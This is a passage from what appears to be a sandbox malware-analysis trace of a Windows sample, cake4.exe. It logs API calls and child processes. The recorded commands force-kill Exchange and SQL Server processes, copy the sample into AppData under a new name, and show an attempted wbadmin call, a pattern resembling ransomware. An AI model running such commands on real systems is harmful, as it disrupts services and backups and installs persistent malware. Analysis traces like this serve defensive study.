out: lpConsoleScreenBufferInfo=0x31f66c) returned 1 [0064.394] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0064.395] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x31f6ac | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0064.395] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x31f690, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x31f690*=0x62) returned 1 [0064.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.396] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0064.397] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.397] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0064.397] SetConsoleInputExeNameW () returned 0x1 [0064.397] GetConsoleOutputCP () returned 0x1b5 [0064.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0064.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.398] exit (_Code=1) Process: id = "13" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x4300b000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "taskkill /f /im MSExchange*" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0x8e4 Thread: id = 31 os_tid = 0xbe8 Thread: id = 35 os_tid = 0x9f8 Thread: id = 43 os_tid = 0x76c Thread: id = 44 os_tid = 0x9e4 Process: id = "14" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x42510000" os_pid = "0x8f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "taskkill /f /im Microsoft.Exchange.*" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0x904 Thread: id = 33 os_tid = 0x870 Thread: id = 38 os_tid = 0x8a4 Thread: id = 39 os_tid = 0x884 Thread: id = 40 os_tid = 0x984 Process: id = "15" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x42f15000" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "taskkill /f /im sqlserver.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x924 Thread: id = 34 os_tid = 0x55c Thread: id = 37 os_tid = 0x8c4 Thread: id = 45 os_tid = 0xb50 Thread: id = 46 os_tid = 0xb40 Process: id = "16" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x4221a000" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "taskkill /f /im sqlwriter.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0x944 Thread: id = 32 os_tid = 0x9c4 Thread: id = 36 os_tid = 0x844 Thread: id = 41 os_tid = 0xb44 Thread: id = 42 os_tid = 0x604 Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41fcc000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0xa90 [0064.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43fa3c | out: lpSystemTimeAsFileTime=0x43fa3c*(dwLowDateTime=0x1b0c2ce0, dwHighDateTime=0x1d62227)) [0064.804] GetCurrentProcessId () returned 0xa98 [0064.804] GetCurrentThreadId () returned 0xa90 [0064.804] GetTickCount () returned 0x1149db6 [0064.804] QueryPerformanceCounter (in: lpPerformanceCount=0x43fa34 | out: lpPerformanceCount=0x43fa34*=18475990473) returned 1 [0064.806] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0064.806] __set_app_type (_Type=0x1) [0064.806] __p__fmode () returned 0x770331f4 [0064.806] __p__commode () returned 0x770331fc [0064.807] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0064.807] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0064.807] GetCurrentThreadId () returned 0xa90 [0064.807] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa90) returned 0x60 [0064.808] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.808] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0064.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.808] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x43f9cc | out: phkResult=0x43f9cc*=0x0) returned 0x2 [0064.809] VirtualQuery (in: lpAddress=0x43fa03, lpBuffer=0x43f99c, dwLength=0x1c | out: lpBuffer=0x43f99c*(BaseAddress=0x43f000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.809] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x43f99c, dwLength=0x1c | out: lpBuffer=0x43f99c*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0064.809] VirtualQuery (in: lpAddress=0x341000, lpBuffer=0x43f99c, dwLength=0x1c | out: lpBuffer=0x43f99c*(BaseAddress=0x341000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0064.809] VirtualQuery (in: lpAddress=0x343000, lpBuffer=0x43f99c, dwLength=0x1c | out: lpBuffer=0x43f99c*(BaseAddress=0x343000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.809] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x43f99c, dwLength=0x1c | out: lpBuffer=0x43f99c*(BaseAddress=0x440000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0064.809] GetConsoleOutputCP () returned 0x1b5 [0064.809] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0064.810] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0064.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.810] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0064.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.810] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0064.811] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.811] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.811] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.811] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0064.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.812] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0064.812] GetEnvironmentStringsW () returned 0x734068* [0064.812] GetProcessHeap () returned 0x720000 [0064.812] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xaca) returned 0x734b40 [0064.813] FreeEnvironmentStringsW (penv=0x734068) returned 1 [0064.813] GetProcessHeap () returned 0x720000 [0064.813] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x4) returned 0x730d20 [0064.813] GetEnvironmentStringsW () returned 0x734068* [0064.813] GetProcessHeap () returned 0x720000 [0064.813] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xaca) returned 0x735618 [0064.813] FreeEnvironmentStringsW (penv=0x734068) returned 1 [0064.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e93c | out: phkResult=0x43e93c*=0x68) returned 0x0 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x0, lpData=0x43e948*=0x0, lpcbData=0x43e940*=0x1000) returned 0x2 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x1, lpcbData=0x43e940*=0x4) returned 0x0 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x0, lpData=0x43e948*=0x1, lpcbData=0x43e940*=0x1000) returned 0x2 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x0, lpcbData=0x43e940*=0x4) returned 0x0 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x40, lpcbData=0x43e940*=0x4) returned 0x0 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x40, lpcbData=0x43e940*=0x4) returned 0x0 [0064.814] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x0, lpData=0x43e948*=0x40, lpcbData=0x43e940*=0x1000) returned 0x2 [0064.814] RegCloseKey (hKey=0x68) returned 0x0 [0064.815] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e93c | out: phkResult=0x43e93c*=0x68) returned 0x0 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x0, lpData=0x43e948*=0x40, lpcbData=0x43e940*=0x1000) returned 0x2 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x1, lpcbData=0x43e940*=0x4) returned 0x0 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x0, lpData=0x43e948*=0x1, lpcbData=0x43e940*=0x1000) returned 0x2 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x0, lpcbData=0x43e940*=0x4) returned 0x0 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x9, lpcbData=0x43e940*=0x4) returned 0x0 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x4, lpData=0x43e948*=0x9, lpcbData=0x43e940*=0x4) returned 0x0 [0064.815] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e944, lpData=0x43e948, lpcbData=0x43e940*=0x1000 | out: lpType=0x43e944*=0x0, lpData=0x43e948*=0x9, lpcbData=0x43e940*=0x1000) returned 0x2 [0064.815] RegCloseKey (hKey=0x68) returned 0x0 [0064.815] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb03200 [0064.815] srand (_Seed=0x5eb03200) [0064.815] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe\"" [0064.815] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c copy \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cake4.exe\" \"%APPDATA%\\mhtop32bit.exe\"" [0064.816] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.816] GetProcessHeap () returned 0x720000 [0064.816] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x210) returned 0x734068 [0064.816] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x734070, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0064.816] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0064.816] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0064.816] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.816] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0064.817] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0064.817] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0064.817] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0064.817] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0064.817] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0064.817] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0064.817] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.817] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0064.817] GetProcessHeap () returned 0x720000 [0064.817] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734b40 | out: hHeap=0x720000) returned 1 [0064.817] GetEnvironmentStringsW () returned 0x734280* [0064.817] GetProcessHeap () returned 0x720000 [0064.817] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xae2) returned 0x736be0 [0064.817] FreeEnvironmentStringsW (penv=0x734280) returned 1 [0064.817] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0064.817] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.817] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0064.817] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0064.817] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0064.817] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0064.818] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0064.818] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0064.818] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0064.818] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0064.818] GetProcessHeap () returned 0x720000 [0064.818] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x54) returned 0x7376d0 [0064.818] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f708 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x43f708, lpFilePart=0x43f704 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43f704*="Desktop") returned 0x25 [0064.818] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.818] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x43f484 | out: lpFindFileData=0x43f484*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x733ee8 [0064.818] FindClose (in: hFindFile=0x733ee8 | out: hFindFile=0x733ee8) returned 1 [0064.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x43f484 | out: lpFindFileData=0x43f484*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x733ee8 [0064.819] FindClose (in: hFindFile=0x733ee8 | out: hFindFile=0x733ee8) returned 1 [0064.819] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0064.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x43f484 | out: lpFindFileData=0x43f484*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x733ee8 [0064.819] FindClose (in: hFindFile=0x733ee8 | out: hFindFile=0x733ee8) returned 1 [0064.819] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.819] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0064.819] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0064.819] GetProcessHeap () returned 0x720000 [0064.819] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x736be0 | out: hHeap=0x720000) returned 1 [0064.819] GetEnvironmentStringsW () returned 0x7360f0* [0064.819] GetProcessHeap () returned 0x720000 [0064.819] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb36) returned 0x737f30 [0064.820] FreeEnvironmentStringsW (penv=0x7360f0) returned 1 [0064.820] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.820] GetProcessHeap () returned 0x720000 [0064.820] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7376d0 | out: hHeap=0x720000) returned 1 [0064.820] GetProcessHeap () returned 0x720000 [0064.820] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400e) returned 0x738a70 [0064.820] GetProcessHeap () returned 0x720000 [0064.821] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb0) returned 0x734dc0 [0064.821] GetProcessHeap () returned 0x720000 [0064.821] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x738a70 | out: hHeap=0x720000) returned 1 [0064.821] GetConsoleOutputCP () returned 0x1b5 [0064.821] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0064.821] GetUserDefaultLCID () returned 0x409 [0064.822] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0064.822] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x43f848, cchData=128 | out: lpLCData="0") returned 2 [0064.822] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x43f848, cchData=128 | out: lpLCData="0") returned 2 [0064.822] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x43f848, cchData=128 | out: lpLCData="1") returned 2 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0064.823] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0064.824] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0064.825] GetProcessHeap () returned 0x720000 [0064.825] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x20c) returned 0x734e78 [0064.825] GetConsoleTitleW (in: lpConsoleTitle=0x734e78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0064.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.826] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0064.826] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.826] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0064.826] GetProcessHeap () returned 0x720000 [0064.826] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400a) returned 0x738a70 [0064.827] GetProcessHeap () returned 0x720000 [0064.827] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x4008) returned 0x73ca88 [0064.827] GetProcessHeap () returned 0x720000 [0064.827] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x735090 [0064.827] GetEnvironmentVariableW (in: 